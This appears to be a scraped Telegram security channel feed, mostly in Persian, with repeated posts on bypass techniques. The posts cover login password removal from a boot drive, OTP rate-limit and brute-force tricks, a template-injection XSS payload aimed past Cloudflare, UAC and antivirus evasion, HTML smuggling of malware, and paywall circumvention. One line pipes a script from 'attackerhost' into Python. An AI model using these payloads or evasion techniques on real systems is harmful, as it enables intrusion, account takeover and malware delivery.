#Bypass Login Passwords
این برنامه را بر روی فلش بوتیبل کنید و بالا بیارید روی کامپیوتر هدف و گزینه حذف رمز را زده و مجدد ریستارت کنید.
🆔 @Engineer_Computer
این برنامه را بر روی فلش بوتیبل کنید و بالا بیارید روی کامپیوتر هدف و گزینه حذف رمز را زده و مجدد ریستارت کنید.
🆔 @Engineer_Computer
⭕ Send OTP Rate Limit Bypass
دورزدن محدودیت در ارسال OTP از طریق اضافه کردن space بعد از مقدار email در درخواست HTTP
https://infosecwriteups.com/bypass-rate-limit-a-blank-space-leads-to-this-random-encounter-e18e72fbf228
#OTP #Bypass #ratelimit
کانال آموزش کامپیوتر
@Engineer_Computer
دورزدن محدودیت در ارسال OTP از طریق اضافه کردن space بعد از مقدار email در درخواست HTTP
https://infosecwriteups.com/bypass-rate-limit-a-blank-space-leads-to-this-random-encounter-e18e72fbf228
#OTP #Bypass #ratelimit
کانال آموزش کامپیوتر
@Engineer_Computer
Medium
Bypass Rate Limit — A blank space leads to this random encounter!
Hello All, Hope you are having a great time!
Cloudflare bypass & template injection to XSS in one shoot
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#cloudflare #bypass #xss
—————
کانال آموزش کامپیوتر
@Engineer_Computer
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#cloudflare #bypass #xss
—————
کانال آموزش کامپیوتر
@Engineer_Computer
نحوه بایپس rate limit request با استفاده از سرویس تور برای fuzzing
https://infosecwriteups.com/bypass-rate-limit-request-fuzzing-etc-with-tor-3a285f3980d2
#BugBounty
#Hunting
#bypass
@Engineer_Computer
https://infosecwriteups.com/bypass-rate-limit-request-fuzzing-etc-with-tor-3a285f3980d2
#BugBounty
#Hunting
#bypass
@Engineer_Computer
Medium
Bypass Rate Limit Request (fuzzing/etc…) With TOR
Hey guys
آموزش نحوه بایپس #SSLPinning در دستگاه های اندروید به منظور دریافت ریکوست های آن در ابزار BurpSuite
#️⃣#️⃣#️⃣#️⃣#️⃣#️⃣#️⃣#️⃣
#AndroidPentesting
#tips
#Bypass
#SSLPinningBypass
🌐🌐🌐🌐🌐🌐🌐🌐
Part 1 ➡️ https://infosecwriteups.com/bypass-ssl-pinning-in-android-phones-part-1-296f9915b273
Part 2 ➡️ https://infosecwriteups.com/bypass-ssl-pinning-in-android-phones-part-2-cda0f6d3913f
@Engineer_Computer
#️⃣#️⃣#️⃣#️⃣#️⃣#️⃣#️⃣#️⃣
#AndroidPentesting
#tips
#Bypass
#SSLPinningBypass
🌐🌐🌐🌐🌐🌐🌐🌐
Part 1 ➡️ https://infosecwriteups.com/bypass-ssl-pinning-in-android-phones-part-1-296f9915b273
Part 2 ➡️ https://infosecwriteups.com/bypass-ssl-pinning-in-android-phones-part-2-cda0f6d3913f
@Engineer_Computer
Medium
Bypass SSL Pinning in Android Phones — Part 1
Hi Guys, This is Shikhar Gupta, with this writeup I am starting my new mobile penetration testing series for android applications.
نحوه دور زدن محدودیت Writeup های premium در برنامه medium با استفاده از افزونه medium-parser و ...
https://optimus-prime.medium.com/how-to-read-premium-medium-articles-for-free-october-2023-7d9bb3e27d0a
#Writeup #Bypass #tips
@Engineer_Computer
https://optimus-prime.medium.com/how-to-read-premium-medium-articles-for-free-october-2023-7d9bb3e27d0a
#Writeup #Bypass #tips
@Engineer_Computer
Medium
How to read premium medium articles for free [October 2023]
Introducing the Medium Parser Extension: Unlocking Premium Contents
⭕️ به منظور خودکارسازی فرایند Privesc در سیستم های لینوکس و یونیکس، یک ابزار توسعه داده شده است که در دستهبندی Missconfig های setuid/setgid و sudo permission ها و ... تمرکز دارد. این ابزار عمدتاً برای مسابقات CTF طراحی شده است، اما در محیط های واقعی نیز قابل استفاده است.
#RedTeam #Privesc #bypass
@Engineer_Computer
Features
Automatically exploit misconfigured sudo permissions.
Automatically exploit misconfigured suid, sgid permissions.
Automatically exploit misconfigured capabilities.
Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
Automatically convert arbitrary file write primitive into shell by writing to cron.
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
Single file, easy to run fileless with curl https://attackerhost/gtfonow.py | python
#RedTeam #Privesc #bypass
@Engineer_Computer
GitHub
GitHub - Frissi0n/GTFONow: Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.
Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins. - Frissi0n/GTFONow
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Bypass Medium Paywall
A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free:
https://freedium.cfd/<URL>
https://medium-forall.vercel.app/
#medium #premium #bypass
@Engineer_Computer
A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free:
https://freedium.cfd/<URL>
https://medium-forall.vercel.app/
#medium #premium #bypass
@Engineer_Computer
🖼 https://raw.githubusercontent.com/matro7sh/BypassAV/main/img/Bypass-AV.png
نقشه تکنیک های دور زدن آنتی ویروس و EDR
#Bypass
#EDR
https://github.com/CMEPW/BypassAV
https://matro7sh.github.io/BypassAV
@Engineer_Computer
نقشه تکنیک های دور زدن آنتی ویروس و EDR
#Bypass
#EDR
https://github.com/CMEPW/BypassAV
https://matro7sh.github.io/BypassAV
@Engineer_Computer
♦️ Collection of #UAC #Bypass Techniques Weaponized as BOFs
🌐 https://github.com/icyguider/UAC-BOF-Bonanza?tab=readme-ov-file
🔺 A single module which integrates all techniques has been provided to use the BOFs via the Havoc C2 Framework
🔱 https://github.com/HavocFramework/Havoc
@Engineer_Computer
🌐 https://github.com/icyguider/UAC-BOF-Bonanza?tab=readme-ov-file
🔺 A single module which integrates all techniques has been provided to use the BOFs via the Havoc C2 Framework
🔱 https://github.com/HavocFramework/Havoc
@Engineer_Computer
GitHub
GitHub - icyguider/UAC-BOF-Bonanza: Collection of UAC Bypass Techniques Weaponized as BOFs
Collection of UAC Bypass Techniques Weaponized as BOFs - icyguider/UAC-BOF-Bonanza
Collection of #UAC #Bypass Techniques Weaponized as BOFs
https://github.com/icyguider/UAC-BOF-Bonanza
@Engineer_Computer
https://github.com/icyguider/UAC-BOF-Bonanza
@Engineer_Computer
GitHub
GitHub - icyguider/UAC-BOF-Bonanza: Collection of UAC Bypass Techniques Weaponized as BOFs
Collection of UAC Bypass Techniques Weaponized as BOFs - icyguider/UAC-BOF-Bonanza
🔥1
#HTML #Smuggling Attack for #Bypass #SOC
در مرکز عملیات امنیت، کارشناسان در تلاش هستند که بواسطه بررسی رویداد های مبتنی بر سیستم عامل و ارتباطات مبتنی بر شبکه، تهدیدات را شکار نمایند.
همچنین بواسطه تکنولوژی DPI یا نظارت عمیق بر پکت ها، تیم امنیت دفاعی سعی خواهد کرد تا نوع ترافیک در جریان را تشخیص بدهد.
ویژگی تکنیک HTML Smuggling این است که بر بستر ترافیک Legitimate یا مشروع، Stage های بد افزار را میتوان بصورت نا محسوس انتقال داد.
مانند تصویر پست که Stage بدافزار را که مبتنی بر فایل فرمت PE است، اول Compress و Encrypt با رمز مشخص میکند و در ادامه بواسطه تکنیک Polyglot با یک فرمت غیر حساس مانند PNG ادغام میکند.
این ادغام به این صورت است که امضای اول فایل PNG دست نخورده و در ادامه داده های Chunk که XOR شده مقادیر فرمت ZIP هستند را باز نویسی میکند.
نهایتا فایل PNG در یک دامنه ای قرار گرفته و در یک صفحه HTML بواسطه جاوا اسکریت src شده و بر روی سیستم قربانی بارگزاری میشود.
فایل HTML پایه میتواند بر روی CDN نیز قرار گرفته شده و IP خط کنترل و فرمان مهاجم نیز پنهان شود.
@Engineer_Computer
در مرکز عملیات امنیت، کارشناسان در تلاش هستند که بواسطه بررسی رویداد های مبتنی بر سیستم عامل و ارتباطات مبتنی بر شبکه، تهدیدات را شکار نمایند.
همچنین بواسطه تکنولوژی DPI یا نظارت عمیق بر پکت ها، تیم امنیت دفاعی سعی خواهد کرد تا نوع ترافیک در جریان را تشخیص بدهد.
ویژگی تکنیک HTML Smuggling این است که بر بستر ترافیک Legitimate یا مشروع، Stage های بد افزار را میتوان بصورت نا محسوس انتقال داد.
مانند تصویر پست که Stage بدافزار را که مبتنی بر فایل فرمت PE است، اول Compress و Encrypt با رمز مشخص میکند و در ادامه بواسطه تکنیک Polyglot با یک فرمت غیر حساس مانند PNG ادغام میکند.
این ادغام به این صورت است که امضای اول فایل PNG دست نخورده و در ادامه داده های Chunk که XOR شده مقادیر فرمت ZIP هستند را باز نویسی میکند.
نهایتا فایل PNG در یک دامنه ای قرار گرفته و در یک صفحه HTML بواسطه جاوا اسکریت src شده و بر روی سیستم قربانی بارگزاری میشود.
فایل HTML پایه میتواند بر روی CDN نیز قرار گرفته شده و IP خط کنترل و فرمان مهاجم نیز پنهان شود.
@Engineer_Computer
⭕️ کشف آسیب پذیری بر روی سامانه بانکی با OTP Bypass
کد های OTP ارسالی از سمت بانک توی DataBase تا مدت قابل توجهی Cash میشد و ما میتونستیم رنج وسیعی از OTP هارو Bruteforce کنیم، بر اساس Error میشد فهمید کدوم OTP ها ارسال شده و منقضی شده بودن و میفهمیدیم کدوم OTP ها ارسال شده بودن ، با تکرار این عمل رنج قابل توجهی از OTP ها ارسال و منقضی شده بودن و میدونستیم قراره چه OTP هایی در ادامه برای کاربر ارسال بشه
https://medium.com/@SecurityAttack/the-otp-code-does-not-expire-9b29cd229bae
#OTP #Bypass
@Engineer_Computer
کد های OTP ارسالی از سمت بانک توی DataBase تا مدت قابل توجهی Cash میشد و ما میتونستیم رنج وسیعی از OTP هارو Bruteforce کنیم، بر اساس Error میشد فهمید کدوم OTP ها ارسال شده و منقضی شده بودن و میفهمیدیم کدوم OTP ها ارسال شده بودن ، با تکرار این عمل رنج قابل توجهی از OTP ها ارسال و منقضی شده بودن و میدونستیم قراره چه OTP هایی در ادامه برای کاربر ارسال بشه
https://medium.com/@SecurityAttack/the-otp-code-does-not-expire-9b29cd229bae
#OTP #Bypass
@Engineer_Computer
Medium
The OTP Code does not Expire!
Hello
I’m Sina from Ninjas Team
I’m Sina from Ninjas Team